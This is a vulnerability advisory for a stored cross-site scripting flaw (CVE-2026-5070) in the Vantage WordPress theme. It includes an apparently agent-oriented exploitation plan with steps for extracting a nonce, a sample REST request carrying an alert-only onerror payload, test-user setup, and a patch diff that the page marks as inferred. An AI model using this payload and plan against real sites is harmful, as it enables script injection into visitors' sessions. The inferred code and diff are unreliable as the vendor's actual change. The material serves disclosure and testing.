CVE-2026-5070

Vantage <= 1.20.32 - Authenticated (Contributor+) Stored Cross-Site Scripting via Gallery Block Text Content

Severity: medium
Weakness: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSS Score: 6.4
Patched in: 1.20.33
Time to patch: 1d

Description

The Vantage theme for WordPress is vulnerable to Stored Cross-Site Scripting via Gallery block text content in versions up to, and including, 1.20.32 due to insufficient output escaping in the gallery template. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Technical Details

Affected versions: <= 1.20.32
Published: April 15, 2026
Last updated: April 16, 2026
Affected theme: vantage

Source Code

WordPress.org SVN: vulnerable v1.20.32, patched v1.20.33
Research Plan (status: Unverified)


Research Plan: CVE-2026-5070 - Vantage Theme Stored XSS

1. Vulnerability Summary

The Vantage theme for WordPress (up to and including version 1.20.32) contains a Stored Cross-Site Scripting (XSS) vulnerability. The flaw exists in the theme's custom rendering logic for the WordPress Gallery block. Specifically, the theme fails to properly sanitize or escape user-supplied text content (likely image captions or block descriptions) before echoing it into the HTML output on the frontend. This allows an authenticated user with Contributor-level permissions or higher to inject malicious scripts into posts, which execute in the context of any user (including administrators) viewing the affected page.

2. Attack Vector Analysis

  • Endpoint: WordPress REST API POST /wp-json/wp/v2/posts or the classic POST /wp-admin/post.php.
  • Vulnerable Parameter: post_content (specifically within the Gutenberg block comment delimiters for wp:gallery).
  • Authentication Level: Contributor+ (any role allowed to create and edit posts).
  • Preconditions: The Vantage theme must be active. At least one image must be present in the Media Library to be included in a Gallery block (or a valid attachment ID must be referenced).

3. Code Flow

  1. Input: A Contributor user saves a post containing a Gallery block. The block's attributes (stored in HTML comments) include an image with a malicious caption: <!-- wp:gallery ... --> ... <figcaption>PAYLOAD</figcaption> ... <!-- /wp:gallery -->.
  2. Storage: WordPress saves the raw block content to the wp_posts table.
  3. Processing: When a user views the post, WordPress parses the blocks. The Vantage theme likely registers a filter on render_block for core/gallery or uses a template override for galleries.
  4. The Sink: In the Vantage theme's gallery rendering function (likely located in inc/gallery.php or a similar template part), the code iterates through the gallery items.
  5. Execution: The code retrieves the caption or description for each image and echoes it directly:
    // Inferred Vulnerable Pattern in Vantage
    $caption = $item['caption']; 
    echo '<div class="vantage-gallery-caption">' . $caption . '</div>'; // Missing esc_html()
    

4. Nonce Acquisition Strategy

With cookie authentication, the REST API requires a valid REST nonce (the X-WP-Nonce header or the _wpnonce parameter) on state-changing requests; without it WordPress treats the request as unauthenticated and a Contributor's POST to /wp-json/wp/v2/posts is rejected. The nonce can be read with the browser_eval tool from an admin page that loads the REST client script.

  1. Navigate to Admin: Use browser_navigate to go to /wp-admin/post-new.php (the block editor loads the REST client together with its nonce).
  2. Extract Nonce: Execute browser_eval("wpApiSettings.nonce").
  3. Alternative (Classic Editor): If the site renders the classic editor form on /wp-admin/post-new.php, extract the form nonce with browser_eval("document.querySelector('#_wpnonce').value"). This is a different nonce (action update-post_<ID>) from the REST one and is only valid for the classic POST /wp-admin/post.php submission.

5. Exploitation Strategy

  1. Authentication: Log in as a Contributor user.
  2. Image Prep: Identify a valid Attachment ID. A default Contributor lacks the upload_files capability, so the attacker cannot add an image via the REST API; the image must already exist in the Media Library (for the test environment, import one as an administrator with wp-cli as in section 6 and note its ID).
  3. Payload Injection:
    • Construct a Gallery block payload where the figcaption or the caption attribute contains an XSS payload: <img src=x onerror=alert(document.domain)>.
    • Caveat: Contributor accounts lack the unfiltered_html capability, so post_content is passed through wp_kses on save and event-handler attributes such as onerror are normally stripped before storage. If the stored content (section 8, step 1) no longer matches what was sent, the sink has to be reached with a payload that survives kses (for example a value the theme writes into an attribute context without escaping quotes) rather than a raw script tag or handler.
    • Send a POST request to /wp-json/wp/v2/posts to create a new post with this content.
  4. Triggering: Navigate to the URL of the newly created post as any user.

Sample HTTP Request (REST API):

POST /wp-json/wp/v2/posts HTTP/1.1
Host: [TARGET_HOST]
Cookie: [CONTRIBUTOR_SESSION_COOKIES]
Content-Type: application/json
X-WP-Nonce: [EXTRACTED_NONCE]

{
  "title": "Gallery Test",
  "status": "publish",
  "content": "<!-- wp:gallery {\"ids\":[ATTACHMENT_ID]} -->\n<figure class=\"wp-block-gallery has-thumbnails\">\n<ul class=\"blocks-gallery-grid\">\n<li class=\"blocks-gallery-item\">\n<figure>\n<img src=\"/path/to/img.jpg\" data-id=\"ATTACHMENT_ID\" />\n<figcaption><img src=x onerror=alert('XSS_SUCCESS')></figcaption>\n</figure>\n</li>\n</ul>\n</figure>\n<!-- /wp:gallery -->"
}

6. Test Data Setup

  1. Theme Installation: Ensure Vantage <= 1.20.32 is installed and active.
  2. User Creation:
    wp user create attacker attacker@example.com --role=contributor --user_pass=password123
  3. Media Setup:
    • Obtain a small, valid JPEG or PNG test image. It must be a real image: WordPress checks files with an image extension against their actual content on upload, and the Gallery block needs an image attachment, so a renamed non-image file will not do.
    • Upload to media library: wp media import /path/to/test.jpg --user=1
    • Note the returned Attachment ID.

7. Expected Results

  • The POST request to create the post should return a 201 Created status.
  • Upon navigating to the post URL (e.g., /?p=123), the browser should execute the alert('XSS_SUCCESS') payload.
  • Checking the page source should reveal the raw <img src=x onerror=...> tag within the gallery container, confirming no escaping occurred.

8. Verification Steps

  1. Verify Content Storage:
    wp post get [POST_ID] --field=post_content
    Confirm the payload is exactly as sent.
  2. Verify Frontend Execution:
    Use browser_navigate to the post permalink and check if the alert or a specific DOM element injected by the payload is present.

9. Alternative Approaches

  • Caption Metadata: If the figcaption in post_content is not the sink, try updating the actual Attachment metadata (caption field) via the REST API:
    POST /wp-json/wp/v2/media/[ATTACHMENT_ID] with {"caption": "<img src=x onerror=alert(1)>"}.
    Vantage may be pulling the caption directly from the attachment object during gallery rendering instead of the block HTML. Caveat: this request needs edit rights on the attachment, which a default Contributor (no upload_files, no edit_others_posts) does not have for media uploaded by other users, so confirm the role can actually reach this path before counting it as Contributor-level.
  • SiteOrigin Integration: If Vantage uses the SiteOrigin Gallery Widget/Block, the payload should be placed in the widget's JSON data structure within the post_content.
Research Findings (static analysis, not yet PoC-verified)

Summary

The Vantage theme for WordPress is vulnerable to Stored Cross-Site Scripting via the Gallery block in versions up to 1.20.32. The theme's custom gallery template fails to properly escape image captions, allowing authenticated contributors to inject malicious JavaScript that executes when users view the affected posts.

Vulnerable Code

// Inferred Vulnerable Pattern in Vantage gallery rendering
$caption = $item['caption']; 
echo '<div class="vantage-gallery-caption">' . $caption . '</div>'; // Missing esc_html() or wp_kses_post()

Security Fix

--- a/inc/gallery.php
+++ b/inc/gallery.php
@@ -1,2 +1,2 @@
-$caption = $item['caption']; 
-echo '<div class="vantage-gallery-caption">' . $caption . '</div>';
+$caption = $item['caption']; 
+echo '<div class="vantage-gallery-caption">' . wp_kses_post( $caption ) . '</div>';
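Review bot: the first removed/added pair in this hunk re-adds `$caption = $item['caption'];` unchanged (only trailing whitespace differs), so the real change is the single echo line; trim the hunk to that line, and, since the page marks both the path inc/gallery.php and the vulnerable pattern as inferred, label this diff as a reconstruction rather than the vendor's 1.20.33 change. On the fix itself: wp_kses_post() is the right call when the caption is meant to keep author-allowed HTML in a text-node context, but it is a sanitizer, not an escaper; if the same value is also written into an attribute (alt, title, data-*), that occurrence needs esc_attr(), which wp_kses_post() does not provide.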

Exploit Outline

The exploit is carried out by an authenticated user with Contributor-level permissions or higher. The attacker creates or edits a post and inserts a WordPress Gallery block. Within the block's content, the attacker injects an XSS payload (e.g., <img src=x onerror=alert(1)>) into the image caption or description fields. When the theme renders the gallery on the frontend, it retrieves the malicious caption and echoes it directly into the HTML without sanitization, triggering script execution in the browser of any visitor viewing the post.
